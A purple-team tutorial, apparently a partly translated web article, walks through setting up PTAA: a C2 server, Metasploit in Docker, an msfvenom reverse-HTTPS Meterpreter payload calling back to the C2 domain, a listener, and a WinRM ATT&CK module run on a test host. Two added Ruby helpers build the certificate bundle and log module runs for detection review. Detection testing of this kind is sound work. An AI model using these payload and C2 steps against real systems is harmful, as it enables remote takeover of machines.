This article walks through setting up and using the automated adversary-simulation tool PTAA (Praetorian's Purple Team Attack Automation). Many people are not yet familiar with it, so the steps below cover everything from standing up the C2 host to running a first ATT&CK technique against a test machine.
To evaluate security detection and incident-response capability, we wanted a way to automate the simulation of adversary attack techniques. The result is a set of MITRE ATT&CK TTPs implemented as Metasploit Framework post modules; at the time of writing, more than 100 TTPs can be simulated automatically.
Metasploit's strength is its stable, robust and extensive library: the framework's modules interact directly with operating-system APIs, and it is flexible and easy to extend. On top of that, Metasploit's execute_powershell capability lets us emulate behaviour such as in-memory .NET execution. This lets a blue team confirm that their tooling alerts on the behaviour of a specific TTP, and not merely on a particular piece of code or action (for example, encoded PowerShell).
我們的工具基于最新版本的Metasploit開(kāi)發(fā)(2019年4月9日版:【Metasploit下載地址】)。在實(shí)現(xiàn)自動(dòng)化機(jī)制的過(guò)程中,我們盡可能地減少了對(duì)Metasploit框架源碼的修改量,以此來(lái)保證用戶(hù)能夠體驗(yàn)到接近原生的Metasploit。
C2 server - sign up for and stand up a cloud virtual machine.
DNS - pick a domain name and create a DNS record for it pointing at the C2 host.
SSL - we recommend testing with a valid SSL certificate; Let's Encrypt is the easy route:
export DNS_NAME="mytestdomain.com"
wget https://dl.eff.org/certbot-auto
chmod a+x ./certbot-auto
./certbot-auto -q
./certbot-auto certonly -d $DNS_NAME --standalone --register-unsafely-without-email -n --agree-tos
Installation follows the Metasploit Docker instructions: https://github.com/rapid7/metasploit-framework/tree/master/docker
Install Docker (the repository line below targets Debian jessie; adjust the distribution and codename to match your C2 host, and confirm the key fingerprint ends in 0EBFCD88 before continuing):
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -
apt-key fingerprint 0EBFCD88
add-apt-repository \
   "deb [arch=amd64] https://download.docker.com/linux/debian jessie stable"
apt-get -y update
apt-get -y install docker-ce
Fetch the project source:
git clone git@github.com:praetorian-inc/purple-team-attack-automation.git
cd purple-team-attack-automation
Set LHOST and the ports exposed by the container (a local override file keeps the stock docker-compose.yml untouched):
echo "version: '3'
services:
  ms:
    environment:
      # example of setting LHOST
      LHOST: 0.0.0.0
    # example of adding more ports
    ports:
      - 8080:8080
      - 443:443
      - 80:80
" > docker-compose.local.override.yml
Set the COMPOSE_FILE environment variable so the local override file is loaded:
echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env
Build the container:
docker-compose build
Run the container:
./docker/bin/msfconsole
Fix permissions on the Metasploit data directory:
chmod -R ugo+rw ~/.msf4
Payload - install the Metasploit omnibus package on the host so that msfvenom is available outside the container, then build a stageless x64 HTTPS Meterpreter that verifies the handler's certificate:
cd ~
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall
msfvenom -p windows/x64/meterpreter_reverse_https lhost=mytestdomain.com lport=443 -a x64 -f exe HandlerSSLCert=~/purple-team-attack-automation/MSF.pem StagerVerifySSLCert=true -o ~/attack-testing.exe
MSF.pem is the handler certificate as a single PEM file containing both the private key and the certificate; with the Let's Encrypt output above that is privkey.pem followed by fullchain.pem. StagerVerifySSLCert=true embeds the certificate's hash in the payload, so rebuild attack-testing.exe whenever the certificate is renewed.
You can start the listener with a sample resource script (the HandlerSSLCert path is relative to the directory msfconsole runs in, which for the container is the repository root):
echo '<ruby>
print_status("Starting HTTPS listener for Windows x64 meterpreter on port 443.")
run_single("use exploit/multi/handler")
run_single("set payload windows/x64/meterpreter_reverse_https")
run_single("set lport 443")
run_single("set HandlerSSLCert MSF.pem")
run_single("set ExitOnSession false")
run_single("set StagerVerifySSLCert true")
run_single("exploit -j")
</ruby>' > ~/purple-team-attack-automation/scripts/resource/windows_listener.rc
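The steps above point both msfvenom and the listener at MSF.pem but never say how that file is produced. HandlerSSLCert expects one PEM file holding the private key and the certificate, which for the Let's Encrypt output is privkey.pem followed by fullchain.pem. The script below is an added example, not part of the original post or the PTAA project: it builds that bundle from a certbot live directory (the /etc/letsencrypt/live/<domain>/ layout is assumed from certbot's defaults) and checks it with Ruby's OpenSSL bindings, the same library Metasploit uses to load the file. The self-signed certificate it falls back to when run without arguments is constructed so the example runs offline.

```ruby
#!/usr/bin/env ruby
# Added example, not part of the original post or the PTAA repository.
# Build the single PEM file that Metasploit's HandlerSSLCert option expects (private key and
# certificate in one file) from a certbot live directory, then check it the way the framework
# will when the handler starts: key parses, certificate parses, and the two belong together.
require 'openssl'
require 'tmpdir'

# Concatenate certbot's privkey.pem and fullchain.pem (key first, by convention).
# Writes out_path with mode 0600 when given, because the bundle holds the private key.
def build_msf_pem(live_dir, out_path = nil)
  key   = File.read(File.join(live_dir, 'privkey.pem'))
  chain = File.read(File.join(live_dir, 'fullchain.pem'))
  bundle = key.end_with?("\n") ? key + chain : key + "\n" + chain
  File.write(out_path, bundle, perm: 0o600) if out_path
  bundle
end

# First PEM block of the given type ("PRIVATE KEY" also matches "RSA PRIVATE KEY" etc.).
def pem_block(bundle, type)
  bundle[/-----BEGIN [A-Z ]*#{type}-----.*?-----END [A-Z ]*#{type}-----/m]
end

# Inspect a bundle. Returns a hash with :ok, the reasons it is not, and the facts worth
# recording before the listener is started (subject, SANs, expiry, SHA-1 fingerprint).
def check_msf_pem(bundle, now: Time.now)
  key_pem  = pem_block(bundle, 'PRIVATE KEY') or raise 'bundle has no private key block'
  cert_pem = pem_block(bundle, 'CERTIFICATE') or raise 'bundle has no certificate block'
  key  = OpenSSL::PKey.read(key_pem)
  cert = OpenSSL::X509::Certificate.new(cert_pem)   # first certificate in fullchain = leaf
  problems = []
  problems << 'private key does not match the leaf certificate' unless cert.check_private_key(key)
  problems << "certificate not yet valid (notBefore #{cert.not_before.utc})" if cert.not_before > now
  problems << "certificate expired (notAfter #{cert.not_after.utc})"         if cert.not_after < now
  san = cert.extensions.find { |e| e.oid == 'subjectAltName' }
  {
    ok: problems.empty?,
    problems: problems,
    subject: cert.subject.to_s,
    sans: san ? san.value : '',
    not_after: cert.not_after.utc,
    days_left: ((cert.not_after - now) / 86_400).floor,
    # StagerVerifySSLCert=true pins the handler certificate's hash inside the payload, so a
    # renewed certificate means a regenerated attack-testing.exe. Keep this value with the payload.
    sha1_fingerprint: OpenSSL::Digest::SHA1.hexdigest(cert.to_der),
  }
end

# Constructed stand-in for /etc/letsencrypt/live/<domain>/ so the example runs offline:
# a self-signed certificate for dns_name and its key, written as privkey.pem and fullchain.pem.
def make_fake_live_dir(dns_name, days: 90)
  dir  = Dir.mktmpdir('live-')
  key  = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version    = 2
  cert.serial     = 1
  cert.subject    = OpenSSL::X509::Name.parse("/CN=#{dns_name}")
  cert.issuer     = cert.subject
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after  = Time.now + days * 86_400
  ef = OpenSSL::X509::ExtensionFactory.new(cert, cert)
  cert.add_extension(ef.create_extension('subjectAltName', "DNS:#{dns_name}"))
  cert.sign(key, OpenSSL::Digest.new('SHA256'))
  File.write(File.join(dir, 'privkey.pem'), key.to_pem, perm: 0o600)
  File.write(File.join(dir, 'fullchain.pem'), cert.to_pem)
  dir
end

if $PROGRAM_NAME == __FILE__
  # Usage: ruby msf_pem.rb /etc/letsencrypt/live/mytestdomain.com ~/purple-team-attack-automation/MSF.pem
  # With no arguments the self-signed stand-in is built and checked instead.
  live_dir = ARGV[0] || make_fake_live_dir('mytestdomain.com')
  report = check_msf_pem(build_msf_pem(live_dir, ARGV[1]))
  report.each { |k, v| puts "#{k}: #{v}" }
end
```

Run it once after every certbot renewal: if :ok is false the listener would fail to start (or the stager would refuse the handler because the pinned hash changed), and the fingerprint it prints is what the payload built with StagerVerifySSLCert=true is checking for.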
監(jiān)聽(tīng)器開(kāi)啟后,payload將以管理員權(quán)限運(yùn)行并發(fā)送回調(diào)信息。
msf5 auxiliary(scanner/smb/impacket/secretsdump) > resource windows_listener.rc
[*] Processing /usr/src/metasploit-framework/scripts/resource/windows_listener.rc for ERB directives.
[*] resource (/usr/src/metasploit-framework/scripts/resource/windows_listener.rc)> Ruby Code (270 bytes)
[*] Starting HTTPS listener for Windows x64 meterpreter on port 443.
payload => windows/x64/meterpreter_reverse_https
lport => 443
lhost => 0.0.0.0
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
[*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] https://0.0.0.0:443 handling request from 192.168.137.11; (UUID: czgdxj3z) Redirecting stageless connection from /2F-7ig9OfztlUGRSOeTJogLC1HD_4Yf2RGj-ZlWaPE6oCIdO_nvk_GC913H-gXl7lhXUXYcn with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://0.0.0.0:443 handling request from 192.168.137.11; (UUID: czgdxj3z) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (172.18.0.3:443 -> 192.168.137.11:52012) at 2019-04-15 16:10:27 +0000

msf5 post(windows/purple/t1005) > use post/windows/purple/t1028
msf5 post(windows/purple/t1028) > info

       Name: Windows Remote Management (T1028) Windows - Purple Team
     Module: post/windows/purple/t1028
   Platform: Windows
       Arch:
       Rank: Normal

Provided by:
  Praetorian

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting                                                        Required  Description
  ----     ---------------                                                        --------  -----------
  CLEANUP  true                                                                   yes       Close any instances of calc
  CMD      winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}   yes       Command to execute
  SESSION  1                                                                      yes       The session to run this module on.

Description:
  Execution, Lateral Movement: Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the winrm command or by any number of programs such as PowerShell.

References:
  CVE: Not available
  https://attack.mitre.org/wiki/Technique/T1028

msf5 post(windows/purple/t1028) > exploit

[+] Found an instance of Calculator running. Killing it.
[*] Executing 'cmd /c winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}' on #<Session:meterpreter 192.168.137.11:52012 (10.0.2.15) "PURPLEDEV\Administrator @ DESKTOP-1">
[!] WinRM service is already running on this machine.
WSManFault
    Message
        ProviderFault
            WSManFault
                Message = WinRM firewall exception will not work since one of the network connection types on this machine is set to Public. Change the network connection type to either Domain or Private and try again.

Error number:  -2144108183 0x80338169
WinRM firewall exception will not work since one of the network connection types on this machine is set to Public. Change the network connection type to either Domain or Private and try again.
create_OUTPUT
    ProcessId = 5456
    ReturnValue = 0
[+] Module T1028W execution successful.
[+] Found an instance of Calculator running. Killing it.
[+] Found an instance of Calculator running. Killing it.
[*] Post module execution completed
msf5 post(windows/purple/t1028) >

Two details in this output matter when it is used as ground truth for the blue team. The [+] lines about Calculator are the module's CLEANUP step, not the technique itself. And the WSManFault shows that winrm quickconfig failed because a network profile on the host is set to Public, yet the module still reports success: the second half of the command, the winrm invoke create on Win32_Process, ran regardless and started calc (ProcessId = 5456, ReturnValue = 0). Read the whole module output, not only the final [+] line, when recording what was actually executed.
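The point of running these modules is to hand the blue team a precise record of what was executed, when, from where and as whom, so that it can be matched against their alerts. msfconsole's spool command writes the console output to a file; the script below is an added example, not part of the original post or the PTAA project, that turns such a log into a ledger of one record per technique run. Its line patterns are taken from the console output shown above, and the embedded sample is that output trimmed to the relevant lines; any other log format would need its own patterns.

```ruby
#!/usr/bin/env ruby
# Added example, not part of the original post or the PTAA repository.
# Turn a spooled msfconsole log (msf5 > spool /path/to/purple.log) of purple-team module runs
# into a ground-truth ledger: one record per technique executed, with when, from where, as whom
# and which command, for the blue team to line up against their alerts. The line shapes below
# are taken from the console output shown above; every other line is ignored.
require 'json'
require 'time'

SESSION_OPEN = /\A\[\*\] Meterpreter session (\d+) opened \((\S+) -> (\S+):\d+\) at (.+)\z/
PROMPT_RUN   = /\Amsf\d+ post\((windows\/purple\/(t\d+[a-z]*))\) > (?:exploit|run)\b/
EXECUTING    = /\A\[\*\] Executing '(.*)' on #<Session:meterpreter (\S+):\d+ \((\S+)\) "([^"@]+?)\s*@\s*([^"]+)">/
WARNING      = /\A\[!\] (.*)\z/
SUCCESS      = /\A\[\+\] Module (\S+) execution successful/
COMPLETED    = /\A\[\*\] Post module execution completed/

# Returns [sessions, records]. sessions: id => {handler:, peer:, opened_at:}.
# A record covers one module run, from its "exploit" prompt to "Post module execution completed".
def parse_purple_log(text)
  sessions = {}
  records  = []
  current  = nil
  text.each_line do |raw|
    line = raw.chomp
    if (m = SESSION_OPEN.match(line))
      sessions[m[1].to_i] = { handler: m[2], peer: m[3], opened_at: Time.parse(m[4]).utc.iso8601 }
    elsif (m = PROMPT_RUN.match(line))
      current = { module: "post/#{m[1]}", technique: m[2].upcase, command: nil, peer: nil,
                  internal_ip: nil, principal: nil, host: nil, warnings: [], success: false }
    elsif current && (m = EXECUTING.match(line))
      current[:command], current[:peer], current[:internal_ip] = m[1], m[2], m[3]
      current[:principal], current[:host] = m[4], m[5]
    elsif current && (m = WARNING.match(line))
      current[:warnings] << m[1]
    elsif current && (m = SUCCESS.match(line))
      current[:success] = true   # only the module's own verdict counts; [+] cleanup lines do not
      current[:reported_as] = m[1]
    elsif current && COMPLETED.match(line)
      records << current
      current = nil
    end
  end
  [sessions, records]
end

# Join each record to the session that produced it (matched on the peer address) and return
# the ledger as an array of hashes, ready to be written as JSON lines.
def purple_ledger(text)
  sessions, records = parse_purple_log(text)
  records.map do |r|
    sess = sessions.values.find { |s| s[:peer] == r[:peer] }
    r.merge(session_opened_at: sess && sess[:opened_at])
  end
end

# Constructed sample: the console output shown above, trimmed to the lines that matter.
SAMPLE_LOG = <<~'LOG'
  [*] Meterpreter session 1 opened (172.18.0.3:443 -> 192.168.137.11:52012) at 2019-04-15 16:10:27 +0000
  msf5 post(windows/purple/t1005) > use post/windows/purple/t1028
  msf5 post(windows/purple/t1028) > exploit
  [+] Found an instance of Calculator running. Killing it.
  [*] Executing 'cmd /c winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}' on #<Session:meterpreter 192.168.137.11:52012 (10.0.2.15) "PURPLEDEV\Administrator @ DESKTOP-1">
  [!] WinRM service is already running on this machine.
  [+] Module T1028W execution successful.
  [+] Found an instance of Calculator running. Killing it.
  [*] Post module execution completed
LOG

if $PROGRAM_NAME == __FILE__
  # Usage: ruby purple_ledger.rb purple.log > ledger.jsonl   (no argument: parse the sample)
  text = ARGV.empty? ? SAMPLE_LOG : ARGF.read
  purple_ledger(text).each { |rec| puts rec.to_json }
end
```

Each ledger line carries the technique ID, the exact command string, the target's internal address and the user it ran as, which is what a detection review needs to ask "did the SIEM alert on T1028 from DESKTOP-1 at 16:10 UTC, and on what?" rather than working from memory. The [!] warning is kept with the record, since, as the transcript shows, a module can report success while part of its command failed.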
That is a complete run of PTAA: a C2 host with a valid certificate, Metasploit in Docker, a payload pinned to the handler certificate, a listener, and one ATT&CK technique executed through a purple-team post module against the resulting session.
Title: How to use the automated penetration testing tool PTAA
URL: http://bm7419.com/article6/psdiig.html